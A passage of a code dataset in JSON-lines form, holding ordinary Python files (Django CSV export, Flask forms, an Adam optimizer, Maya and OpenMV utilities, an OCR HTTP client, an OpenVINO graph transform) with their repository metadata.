filter(slug__in=settings.CAPOLUOGHI_PROVINCIA).\\\n order_by('-cluster', 'denominazione')\n altri_territori = list(\n Territorio.objects.filter(territorio=Territorio.TERRITORIO.C).\n exclude(id__in=capoluoghi_provincia).\n order_by('-cluster', 'denominazione'))\n\n\n # depending on the territori_type value runs the import only for capoluoghi di provincia or for all Territori\n # prioritize the territori list getting first the capoluoghi di provincia and then all the rest\n\n if territori_type == 'capoluoghi':\n self.export_incarichi(capoluoghi_provincia, output_file, dryrun)\n\n if territori_type == 'others':\n self.export_incarichi(altri_territori, output_file, dryrun)\n\n if territori_type == 'all':\n all_territori = sorted(\n chain(capoluoghi_provincia, altri_territori, ),\n key=lambda instance: instance.denominazione)\n\n self.export_incarichi(all_territori, output_file, dryrun)\n\n def export_incarichi(self, territori_set, output_file, dryrun):\n\n # export to csv incarichi for territorio\n queryset = Incarico.objects.filter(territorio__in=territori_set).order_by('territorio__denominazione')\n dump(qs=queryset, outfile_path=output_file)\n\n\n\n\n","repo_name":"DeppSRL/open_bilanci","sub_path":"bilanci_project/territori/management/commands/export_incarichi.py","file_name":"export_incarichi.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13058958209","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/result', methods=['POST'])\ndef display_result():\n name = request.form['name']\n location = request.form['location']\n fav_lang = request.form['favLang']\n stack = request.form['curStack']\n exp = request.form.getlist('expIn')\n comment = request.form['comment']\n\n return render_template('result.html',\n name=name, location=location, fav_lang=fav_lang,\n stack=stack, exp=\", \".join(exp), comment=comment)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"anthony-nagtalon/coding_dojo","sub_path":"flask/flask_fundamentals/dojo_survey/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23950337873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 25 13:54:30 2017\n\n@author: DA\n\"\"\"\n\nfrom numba import jit\nimport numpy as np\n\n# http://cs231n.github.io/neural-networks-3/#ada\n# http://int8.io/comparison-of-optimization-techniques-stochastic-gradient-descent-momentum-adagrad-and-adadelta/#Adam_8211_description\n# Use moving averages of magnitude and direction of gradient vector\n\n@jit\ndef adam(x, dx, config=None):\n \"\"\"\n Uses the Adam update rule, which incorporates moving averages of both the\n gradient and its square + bias correction\n Config format:\n - learning_rate: Scalar learning rate\n - beta1: Decay rate for moving average of first moment of gradient\n - beta2: Decay rate for moving average of second moment of gradient\n - epsilon: Small scalar used for smoothing to avoid dividing by zero\n - m: Moving average of gradient\n - v: Moving average of squared gradient\n - t: Iteration number\n \"\"\"\n if config is None: config = {}\n config.setdefault('learning_rate', 1e-3)\n config.setdefault('beta1', 0.9)\n config.setdefault('beta2', 0.999)\n config.setdefault('epsilon', 1e-8)\n config.setdefault('m', np.zeros_like(x))\n config.setdefault('v', np.zeros_like(x))\n config.setdefault('t', 0)\n\n config['t'] += 1\n \n # Exponential moving average\n config['m'] = config['beta1']*config['m'] + (1-config['beta1'])*dx\n config['v'] = config['beta2']*config['v'] + (1-config['beta2'])*(dx**2)\n\n # Warm-up phase\n mt = config['m'] / (1-config['beta1']**config['t'])\n vt = config['v'] / (1-config['beta2']**config['t'])\n\n next_x = x - config['learning_rate'] * mt / (np.sqrt(vt) + config['epsilon']) \n \n return next_x, config","repo_name":"DataDan01/CS231n-Notes","sub_path":"Assignment 2/Clean Attempt/optim_algs.py","file_name":"optim_algs.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"40107188127","text":"# -*- coding: utf-8 -*-\n# author:yangtao\n# time: 2022/11/08\n\n# 此脚本用来检查物体是否过于巨大,或者距离坐标中心太远\n\nimport maya.cmds as cmds\n\n\n# 获取选中的 transform 节点\ntransforms = cmds.ls(sl=True, type=\"transform\")\n# 不能超过的最大值,100000\n__far = 1e5\n\n\ninvalid = []\nfor tran in transforms:\n # 获取世界坐标下物体位置的最大最小值\n # boundingBox 的返回的值按以下顺序排列:xmin ymin zmin xmax ymax zmax\n bounding_box = cmds.xform(tran, q=1, worldSpace=True, boundingBox=True)\n # 最小值小于 -1e5 或者 最大值大于 1e5 为无效物体\n if any(x < -__far for x in bounding_box[:3]) \\\n or any(x > __far for x in bounding_box[3:]):\n invalid.append(tran)\n\nif invalid:\n raise ValueError(\"Nodes found far away or of big size ('{far}'): {0}\".format(invalid, far=__far))","repo_name":"Tody190/ExampleCode","sub_path":"MayaCode/MayaValidateCode/validate_scene_dimensions.py","file_name":"validate_scene_dimensions.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23563879119","text":"import functools\nimport shutil\nfrom pathlib import Path\nfrom functools import lru_cache\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom loguru import logger\nfrom torch import Tensor\nimport torch\nfrom skimage.io import imsave\nimport warnings\nfrom typing import *\n\nfrom Storage_and_Meter.metric_container import SummaryWriter, __tensorboard_queue__\nfrom general_utils.dataType_fn_tool import _empty_iterator, _is_tensor, _is_iterable_tensor\n\nimport zipfile\nimport os\n\ndef save_segmentations(segs: Tensor, names: Iterable[str], root: Union[str, Path], mode: str, data_idx) -> None:\n # save the segmentation maps\n (b, w, h) = segs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n for seg, name in zip(segs, names):\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, name[8:11], name).with_suffix(\".png\") # BraTS20\n elif data_idx in['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, name[9:13], name).with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), seg.cpu().numpy().astype(np.uint8))\n\ndef save_shifted_Imgs(imgs: Tensor, names: Iterable[str], root: Union[str, Path], mode: str, data_idx) -> None:\n if isinstance(imgs, Tensor):\n (b, w, h) = imgs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n for img, name in zip(imgs, names):\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, name[8:11], name).with_suffix(\".png\") # BraTS20\n elif data_idx in ['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, name[9:13], name).with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), img.cpu().numpy())\n elif isinstance(imgs, List):\n imgs = torch.stack(imgs, dim=1).squeeze(2)\n n, steps, g, w = imgs.shape\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n iter = 0\n for iter_img in img:\n if data_idx in ['BraTS20']:\n save_path = Path(root, mode, names[idx][8:11], names[idx], f'{iter}').with_suffix(\".png\") # BraTS20\n elif data_idx in ['mmwhs', 'mmwhs_new']:\n save_path = Path(root, mode, names[idx][9:13], names[idx], f'{iter}').with_suffix(\".png\") # mmwhs\n\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), iter_img.cpu().numpy())\n iter = iter + 1\n idx = idx + 1\n\n\ndef seg_results(img, label):\n # img.shape = n h w, 1 row n colum visualization\n fig = plt.figure()\n assert img.shape == label.shape\n assert len(img.shape) == 3\n\n n,h,w = img.shape\n for i in range(1, n+1):\n ax = plt.subplot(1, n, i)\n img_sub = tensor2plotable(img[i-1])\n ax.imshow(img_sub, cmap=\"gray\")\n label_sub = tensor2plotable(label[i-1])\n ax.contour(label_sub)\n return fig\n\ndef save_diffusion_imgs(imgs: Union[Tensor, List], root: Union[str, Path], cur_epoch) -> None:\n if isinstance(imgs, list):\n imgs = torch.stack(imgs, dim=1).squeeze(2)\n n, iter, g, w = imgs.shape\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n iter = 0\n for iter_img in img:\n save_path = Path(f'runs', root, f'{cur_epoch}epoch', f'{idx}_img', f'DPM_T_{iter}').with_suffix(\".png\")\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), iter_img.cpu().numpy())\n iter = iter + 1\n idx = idx + 1\n\n elif isinstance(imgs, Tensor):\n (b, w, h) = imgs.shape # type: Tuple[int, int,int] # Since we have the class numbers, we do not need a C axis\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=UserWarning)\n idx = 0\n for img in imgs:\n save_path = Path(f'runs', root, f'{cur_epoch}epoch', f'{idx}_img', f'TO').with_suffix(\".png\")\n save_path.parent.mkdir(parents=True, exist_ok=True)\n imsave(str(save_path), img.cpu().numpy())\n idx = idx + 1\n\n\n\ndef save_sdfmaps(diffusion_sdf, style):\n n1, n2, h, w = diffusion_sdf.shape\n fig = plt.figure()\n for i1 in range(1, n1 + 1):\n for i2 in range(1, n2 + 1):\n ax = plt.subplot(n1, n2, (i1 - 1) * n1 + i2)\n img = diffusion_sdf[i1 - 1, i2 - 1]\n\n if style == 'hot': # probability map\n im_ = ax.imshow(img, cmap=\"hot\")\n fig.colorbar(im_, ax=ax, orientation='vertical')\n elif style == 'grey': # features map\n img = tensor2plotable(img)\n ax.imshow(img, cmap='gray')\n plt.title(f'SDF_DPMSDF')\n return fig\n\ndef tensor2plotable(tensor) -> np.ndarray:\n if isinstance(tensor, np.ndarray):\n return tensor\n elif isinstance(tensor, torch.Tensor):\n return tensor.detach().cpu().numpy()\n else:\n raise TypeError(f\"tensor should be an instance of Tensor, given {type(tensor)}\")\n\ndef multi_slice_viewer_debug(\n img_volume: Union[Tensor, List[Tensor], Tuple[Tensor, ...]],\n *gt_volumes: Tensor,\n no_contour=False,\n block=False,\n alpha=0.2,\n) -> None:\n def process_mouse_wheel(event):\n fig = event.canvas.figure\n for i, ax in enumerate(fig.axes):\n if event.button == \"up\":\n previous_slice(ax)\n elif event.button == \"down\":\n next_slice(ax)\n fig.canvas.draw()\n\n def process_key(event):\n fig = event.canvas.figure\n ax = fig.axes[0]\n if event.key == \"j\":\n previous_slice(ax)\n elif event.key == \"k\":\n next_slice(ax)\n fig.canvas.draw()\n\n def previous_slice(ax):\n img_volume = ax.img_volume\n ax.index = (ax.index - 1) if (ax.index - 1) >= 0 else 0 # wrap around using %\n ax.images[0].set_array(img_volume[ax.index])\n\n if ax.gt_volume is not None:\n if not no_contour:\n for con in ax.con.collections:\n con.remove()\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con.remove()\n ax.con = ax.imshow(ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\")\n ax.set_title(f\"plane = {ax.index}\")\n\n def next_slice(ax):\n img_volume = ax.img_volume\n ax.index = (\n (ax.index + 1)\n if (ax.index + 1) < img_volume.shape[0]\n else img_volume.shape[0] - 1\n )\n ax.images[0].set_array(img_volume[ax.index])\n\n if ax.gt_volume is not None:\n if not no_contour:\n for con in ax.con.collections:\n con.remove()\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con.remove()\n ax.con = ax.imshow(ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\")\n ax.set_title(f\"plane = {ax.index}\")\n\n ## assertion part:\n assert _is_tensor(img_volume) or _is_iterable_tensor(\n img_volume\n ), f\"input wrong for img_volume, given {img_volume}.\"\n assert (\n _is_iterable_tensor(gt_volumes) or gt_volumes == ()\n ), f\"input wrong for gt_volumes, given {gt_volumes}.\"\n if _is_tensor(img_volume):\n img_volume = [img_volume]\n row_num, col_num = len(img_volume), max(len(gt_volumes), 1)\n\n fig, axs = plt.subplots(row_num, col_num)\n if not isinstance(axs, np.ndarray):\n # lack of numpy wrapper\n axs = np.array([axs])\n axs = axs.reshape((row_num, col_num))\n\n for _row_num, row_axs in enumerate(axs):\n # each row\n assert len(row_axs) == col_num\n for _col_num, ax in enumerate(row_axs):\n ax.img_volume = tensor2plotable(img_volume[_row_num])\n ax.index = ax.img_volume.shape[0] // 2\n ax.imshow(ax.img_volume[ax.index], cmap=\"gray\")\n ax.gt_volume = (\n None\n if _empty_iterator(gt_volumes)\n else tensor2plotable(gt_volumes[_col_num])\n )\n try:\n if not no_contour:\n ax.con = ax.contour(ax.gt_volume[ax.index])\n else:\n ax.con = ax.imshow(\n ax.gt_volume[ax.index], alpha=alpha, cmap=\"rainbow\"\n )\n except:\n pass\n ax.axis(\"off\")\n ax.set_title(f\"plane = {ax.index}\")\n\n fig.canvas.mpl_connect(\"key_press_event\", process_key)\n fig.canvas.mpl_connect(\"scroll_event\", process_mouse_wheel)\n plt.show(block=block)\n\n#---------seg line----------\ndef get_tb_writer() -> SummaryWriter:\n if len(__tensorboard_queue__) == 0:\n raise RuntimeError(\n \"`get_tb_writer` must be call after with statement of a writer\"\n )\n return __tensorboard_queue__[-1]\n\nclass switch_plt_backend:\n\n def __init__(self, env=\"agg\") -> None:\n super().__init__()\n self.env = env\n\n def __enter__(self):\n self.prev = matplotlib.get_backend()\n matplotlib.use(self.env, force=True)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n matplotlib.use(self.prev, force=True)\n\n def __call__(self, func):\n functools.wraps(func)\n\n def wrapper(*args, **kwargs):\n with self:\n return func(*args, **kwargs)\n\n return wrapper\n\nclass FeatureMapSaver:\n\n def __init__(self, save_dir: Union[str, Path], folder_name=\"vis\", use_tensorboard: bool = True) -> None:\n assert Path(save_dir).exists() and Path(save_dir).is_dir(), save_dir\n self.save_dir: Path = Path(save_dir)\n self.folder_name = folder_name\n (self.save_dir / self.folder_name).mkdir(exist_ok=True, parents=True)\n self.use_tensorboard = use_tensorboard\n\n @switch_plt_backend(env=\"agg\")\n def save_map(self) -> None:\n \"\"\"\n Args:\n\n \"\"\"\n # todo\n\n def zip(self) -> None:\n \"\"\"\n Put all image folders as a zip file, in order to avoid IO things when downloading.\n \"\"\"\n try:\n shutil.make_archive(str(self.save_dir / self.folder_name.replace(\"/\", \"_\")), 'zip',\n str(self.save_dir / self.folder_name))\n shutil.rmtree(str(self.save_dir / self.folder_name))\n except (FileNotFoundError, OSError, IOError) as e:\n logger.opt(exception=True, depth=1).warning(e)\n\n @property\n @lru_cache()\n def tb_writer(self):\n try:\n writer = get_tb_writer()\n except RuntimeError:\n writer = None\n return writer\n\ndef compress_and_delete_folder(folder_path):\n \"\"\"\n Compresses a folder using the `shutil` module and deletes the original folder\n using the `os` module to release disk space.\n\n Parameters:\n -----------\n folder_path : str\n The path to the folder that needs to be compressed and deleted.\n\n Returns:\n --------\n None\n \"\"\"\n # Get the name of the folder for naming the zip file\n folder_name = os.path.basename(folder_path)\n\n # Compress the folder into a zip file\n shutil.make_archive(folder_name, 'zip', folder_path)\n\n # Delete the original folder to release disk space\n shutil.rmtree(folder_path)\n","repo_name":"WangPing521/DPM_code_share","sub_path":"general_utils/image_save_fn_tool.py","file_name":"image_save_fn_tool.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10883953490","text":"#num = int(input('Digite o número: '))\r\n#for c in range(1, num+1):\r\n# if num / c == 1 and num / 1 == c and num % 2 != 0 and num % 3 != 0 and num % 5 != 0:\r\n# print('Número primo')\r\nnum = int(input('Digite o número: '))\r\ndiv = 0\r\nfor c in range(1, num+1):\r\n if num % c == 0 and num % num == 0:\r\n div += 1\r\nif div == 2:\r\n print('O número {} só tem {} divisores, e portanto é primo.'.format(num, div))\r\nelse:\r\n print('O número {} possui {} divisores, e portanto não é primo.'.format(num, div))\r\nprint('Acabou')\r\n","repo_name":"lcaldara/python3","sub_path":"exercicios curso em video/desafio52 - num primo.py","file_name":"desafio52 - num primo.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21053659885","text":"import sys\nfrom PyQt5.QtWidgets import *\nclass Windows(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setFixedSize(300,150)\n #外层容器\n container=QVBoxLayout()\n #表单容器\n form_layout=QFormLayout()\n #账���输入框\n edit1=QLineEdit()\n edit1.setPlaceholderText(\"请输入账号:\")\n form_layout.addRow(\"账号:\",edit1)\n #密码输入框\n edit2=QLineEdit()\n edit2.setPlaceholderText(\"请输入密码:\")\n form_layout.addRow(\"密码:\",edit2)\n\n #form_layout添加到垂直布局容器里\n container.addLayout(form_layout)\n \n\n #按钮\n login_btn=QPushButton(\"登录\")\n login_btn.setFixedSize(100,30)\n container.addWidget(login_btn)\n \n self.setLayout(container)\n\nif __name__==\"__main__\":\n app=QApplication(sys.argv)\n w=Windows()\n w.show()\n # w.resize()\n w.resize(300,200)\n w.setWindowTitle(\"表单布局\")\n app.exec()\n\n\n","repo_name":"6iujiale/All_Projects","sub_path":"Python/python模块/PyQt/code/布局/QFormLayout_表单布局.py","file_name":"QFormLayout_表单布局.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38823549721","text":"\"\"\"!Constants used throughout the tcutil package\n\nThis module contains various constants, including the Earth\n\"radius\" and unit conversions. Unit conversion constants are given as\nfractions.Fraction objects to allow the conversion to be exact.\"\"\"\n\n##@var __all__\n# ensures that \"from tcutil.constants import *\" does nothing\n__all__=['']\n\nimport fractions\n\n# Metric/SI/nautical unit conversions: these conversions are exact.\n# knots, nmi: http://www.nist.gov/pml/wmd/metric/length.cfm\n# ft/inches: http://physics.nist.gov/cuu/Units/outside.html\n\n##@var ft2m\n# \"\"\"US foot to meters conversion (exact).\"\"\"\nft2m = fractions.Fraction(12*254,10000)\n\"\"\"US foot to meters conversion (exact).\"\"\"\n\n##@var m2ft\n# Meters to US foot conversion (exact).\nm2ft = 1/ft2m\n\"\"\"Meters to US foot conversion (exact).\"\"\"\n\n##@var nmi2km\n# Nautical miles to kilometers conversion (exact).\nnmi2km = fractions.Fraction(1852,1000)\n\"Nautical miles to kilometers conversion (exact).\"\"\"\n\n##@var km2nmi\n# Kilometers to nautical miles conversion (exact).\nkm2nmi = 1/nmi2km\n\"\"\"Kilometers to nautical miles conversion (exact).\"\"\"\n\n##@var kts2mps\n# Knots to meters per second conversion (exact).\nkts2mps = fractions.Fraction(1852,3600)\n\"\"\"Knots to meters per second conversion (exact).\"\"\"\n\n##@var mps2kts\n# Meters per second to knots conversion (exact).\nmps2kts = 1/kts2mps\n\"\"\"Meters per second to knots conversion (exact).\"\"\"\n\n# Various earth radii from the tcutilutil library constants_module:\n##@var Rpole\n# EGM2008 Earth radius at the pole.\nRpole = 6356752.3142\n\"\"\"EGM2008 Earth radius at the pole.\"\"\"\n\n##@var Requator\n# EGM2008 Earth radius at the equator.\nRequator = 6378137.0000\n\"\"\"EGM2008 Earth radius at the equator.\"\"\"\n\n##@var flattening\n# EGM2008 Earth flattening ratio.\nflattening = 1/298.257223563\n\"\"\"EGM2008 Earth flattening ratio.\"\"\"\n\n##@var REmean\n# Earth mean ellipsoid radius from IUGG 1980\nREmean = 6371009.0\n\"\"\"Earth mean ellipsoid radius from IUGG 1980\"\"\"\n\n##@var REauthalic\n# Earth authalic (equal surface area) radius from IUGG 1980\nREauthalic = 6371007.2\n\"\"\"Earth authalic (equal surface area) radius from IUGG 1980\"\"\"\n\n##@var REvolume\n# Earth equal volume radius from IUGG 1980\nREvolume = 6371000.8\n\"\"\"Earth equal volume radius from IUGG 1980\"\"\"\n\n##@var RErectifying\n# Earth rectivying (equal circumference) radius from IUGG 1980\nRErectifying = 6367449.1\n\"\"\"Earth rectivying (equal circumference) radius from IUGG 1980\"\"\"\n\n##@var Rearth\n# A compromise: the average of the mean ellipsoid radius, authalic radius and equal volume radius\nRearth = (REmean+REauthalic+REvolume)/3\n\"\"\"Average of the mean ellipsoid radius, authalic radius and equal\nvolume radius.\"\"\"\n","repo_name":"hafs-community/HAFS","sub_path":"ush/tcutil/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"16334393826","text":"#\n# utility library\n# this module must be manually copied into the root folder of the OpenMV Cam\n#\n\nimport pyb, math, time\nimport sensor, image\n\nperspective_factor = None # typical range 0.10 - 0.20 for \"normal\" lens\nwantPerspectiveCorrection = False\nperspective_corrector = None\nhisteq_wanted = False\nnegate_wanted = False\n\ndef constrain(value, min, max):\n if value < min :\n return min\n if value > max :\n return max\n else:\n return value\n\ndef init_perspective_corrector():\n global perspective_factor, wantPerspectiveCorrection, perspective_corrector\n perspective_factor = 0.35\n lens_corr_factor = 1.85\n wantPerspectiveCorrection = False\n\ndef correct_perspective(img):\n global perspective_factor, wantPerspectiveCorrection, perspective_corrector\n if wantPerspectiveCorrection:\n img.rotation_corr( corners = perspective_corrector )\n #img.lens_corr(lens_corr_factor)\n\ndef set_histeq_wanted(newState):\n global histeq_wanted\n if (newState == 1):\n histeq_wanted = True\n else:\n histeq_wanted = False\n\ndef set_negate_wanted(newState):\n global negate_wanted\n if (newState == 1):\n negate_wanted = True\n else:\n negate_wanted = False\n\ndef get_histeq_wanted():\n global histeq_wanted\n return histeq_wanted\n\ndef get_negate_wanted():\n global negate_wanted\n return negate_wanted\n\n\ndef set_perspective_correction(newState):\n global wantPerspectiveCorrection\n wantPerspectiveCorrection = newState\n\ndef set_perspective_factor(new_factor):\n global perspective_factor, w_left, w_right, wantPerspectiveCorrection, perspective_corrector\n w = sensor.width()\n h = sensor.height()\n perspective_factor = new_factor\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n\n\ndef set_cam_rez_for_blobs(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_grayscale(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.GRAYSCALE)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_lane_lines(sensor):\n global perspective_factor, perspective_corrector\n sensor.set_pixformat(sensor.GRAYSCALE)\n sensor.set_framesize(sensor.QQVGA) # use QQVGA for speed.\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n\ndef set_cam_rez_for_regression_lines(sensor):\n global perspective_factor, perspective_corrector\n # note QQQVGA yeilds approx 75 FPS, QQVGA yields approx 40 FPS\n sensor.set_pixformat(sensor.GRAYSCALE)\n #sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QQQVGA)\n #sensor.set_framesize(sensor.QQVGA)\n w = sensor.width()\n h = sensor.height()\n w_left = (perspective_factor * w)\n w_right = w - (perspective_factor * w)\n perspective_corrector = [ [w_left, 0], [w_right, 0], [w, h], [0, h] ]\n return\n","repo_name":"dnkorte/DonKCar","sub_path":"code_openmv/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33860604535","text":"import json\r\nimport requests\r\nimport os\r\nimport base64\r\nimport sys\r\nsys.path.append(\"..\")\r\nimport ocr.utils\r\n\r\n\r\n\r\nclass HTTPReader():\r\n def __init__(self, sdk=\"MLKit\",url=\"http://192.168.8.68:8888/\"):\r\n self.url = url\r\n self.sdk = sdk\r\n self.postprocessing = \"mrz\"\r\n self.need_sort = True\r\n \r\n def ocr(self, img_path):\r\n with open(img_path, \"rb\") as img_file:\r\n b64_string = base64.b64encode(img_file.read())\r\n dic = {'base64':b64_string.decode(\"utf-8\"),'sdk':self.sdk}\r\n r = requests.post(self.url, json = dic)\r\n result_dict = json.loads(r.text)\r\n lines = result_dict[\"results\"]\r\n if self.need_sort:\r\n lines = ocr.utils.sort_boxes(lines)\r\n result_dict[\"raw_boxes\"] = lines\r\n result_dict[\"boxes\"] = ocr.utils.postprocess(self.postprocessing,lines)\r\n \r\n result_dict.pop(\"results\")\r\n return result_dict\r\n \r\n \r\nif __name__ == '__main__':\r\n\r\n reader = HTTPReader()\r\n \r\n results = reader.ocr(\"test.jpg\")\r\n print(results)\r\n ","repo_name":"xulihang/OCR-Benchmark-Tool","sub_path":"ocr/http_reader.py","file_name":"http_reader.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13023439449","text":"import numpy as np\n\nfrom extensions.middle.AnchorToPriorBox import AnchorToPriorBoxes\nfrom mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\nfrom mo.ops.const import Const\n\n\nclass SsdAnchorsMiddleReplacer(MiddleReplacementPattern):\n \"\"\"\n Replacing subgraph with all anchors constant to constant op with pre calculated prior boxes values.\n \"\"\"\n enabled = True\n force_clean_up = True\n graph_condition = [lambda graph: graph.graph['fw'] == 'mxnet' and graph.graph['cmd_params'].enable_ssd_gluoncv]\n\n def run_after(self):\n return [AnchorToPriorBoxes]\n\n\n def pattern(self):\n return dict(\n nodes=[\n ('const', dict(op='Const')),\n ('const_data', dict(kind='data')),\n ('reshape0', dict(op='Reshape')),\n ('reshape0_data', dict(kind='data')),\n ('reshape1', dict(op='Reshape')),\n ('reshape1_data', dict(kind='data')),\n ('reshape2', dict(op='Reshape')),\n ('reshape2_data', dict(kind='data')),\n ('reshape3', dict(op='Reshape')),\n ('reshape3_data', dict(kind='data')),\n ('concat', dict(op='Concat')),\n ],\n edges=[\n ('const', 'const_data'),\n ('const_data', 'reshape0'),\n ('reshape0', 'reshape0_data'),\n ('reshape0_data', 'reshape1'),\n ('reshape1', 'reshape1_data'),\n ('reshape1_data', 'reshape2'),\n ('reshape2', 'reshape2_data'),\n ('reshape2_data', 'reshape3'),\n ('reshape3', 'reshape3_data'),\n ('reshape3_data', 'concat'),\n ])\n\n def replace_pattern(self, graph: Graph, match: dict):\n #self.pattern()['nodes']\n concat_node = match['concat']\n if len(concat_node.out_nodes()[0].out_nodes()) == 0:\n return\n const_values = []\n for in_node_index in concat_node.in_nodes():\n current_node = concat_node.in_port(in_node_index).get_source().node\n for k, v in reversed(self.pattern()['nodes'][:-1]):\n if 'op' in v:\n assert current_node.op == v['op']\n current_node = current_node.in_port(0).get_source().node\n if current_node.op == 'Const':\n crop_value = current_node.value\n crop_value = np.reshape(crop_value, (1, -1))\n const_values.append(crop_value)\n break\n concat_value = np.concatenate(tuple(const_values), axis=1)\n concat_value = np.reshape(concat_value, (1, 2, -1))\n slice_value = concat_value[0][0]\n for i in range(int(concat_value[0][0].size / 4)):\n index = i * 4\n xmin = slice_value[index] - (slice_value[index+2] / 2)\n ymin = slice_value[index + 1] - (slice_value[index + 3] / 2)\n xmax = slice_value[index] + (slice_value[index + 2] / 2)\n ymax = slice_value[index + 1] + (slice_value[index + 3] / 2)\n slice_value[index] = xmin\n slice_value[index + 1] = ymin\n slice_value[index + 2] = xmax\n slice_value[index + 3] = ymax\n\n val_node = Const(graph, {'name': concat_node.name + '/const_',\n 'value': concat_value}).create_node_with_data()\n out_node = concat_node.out_port(0).get_destination().node\n concat_node.out_port(0).disconnect()\n out_node.in_port(2).connect(val_node.in_node().out_port(0))\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/ssd_anchors_to_const.py","file_name":"ssd_anchors_to_const.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"24645858989","text":"import json\r\nfrom flask import Flask\r\n\r\n\r\napp = Flask(__name__,static_url_path='/static')\r\n\r\ncontacts=[]\r\nDATA=\"contacts.json\"\r\ndef load():\r\n with open(DATA, \"r\") as f:\r\n return json.load(f)\r\n\r\ndef save():\r\n with open(DATA,\"w\") as f:\r\n return json.dump(contacts,f,indent=4)\r\n\r\n\r\n@app.route(\"/\", methods=['GET','POST'])\r\ndef hello_world():\r\n return \"\"\"

    hello world

